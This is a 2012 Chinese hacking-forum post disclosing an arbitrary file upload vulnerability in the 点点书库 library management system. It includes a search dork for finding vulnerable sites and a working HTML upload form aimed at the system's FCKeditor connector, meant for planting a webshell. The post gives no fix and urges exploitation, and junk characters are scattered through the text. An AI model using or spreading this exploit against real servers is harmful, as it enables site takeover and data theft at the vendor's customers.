主题:图书馆系统任意文件上传漏洞2 G3 O0 ^$ V, f
作者:冰锋刺客
0 [: Y8 G9 [" R 厂商:点击书(dianjishu.com)1 m7 Z8 f3 `1 ^' V* @1 y F
日期:2012-6-21
8 ^. M# I+ [* f: H2 t$ X2 [ & H8 K4 b: ?$ h* Q
I 概述7 q. Y( {( ]' Z" Y% r+ y9 |% F3 H
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell, ^1 e! `# d) H4 }# L1 Z5 a
II 简介
E; J' [; G' \ ?& M2 f. B& L4 |1 K `4 a 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved", l4 i9 @! D# B. X: |: n: k
补充一个漏洞
) g% ^7 C+ ?0 g4 S <form id="frmUpload" enctype="multipart/form-data"
$ w: Q" u* e$ v action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
# \7 j. x: R5 w3 @4 p, B <input id="btnUpload" type="submit" value="操翻他">
' z, e7 j' i$ x: E% `, @ </form>) Q' J5 Q1 }: p" v/ c: J- ^
你们懂的
' G8 _/ V' G+ c% k& F; A 那傻逼提供还需要改包.7 P( Z2 q8 i l2 Y
自己看了下源代码发现fckeditor
$ e H: {5 `( S- \# x: ~4 e 直接秒杀$ x6 b$ \7 C! S( g. E! d! V z1 a
|
发表于 2012-9-10 21:20:59
收藏
支持
反对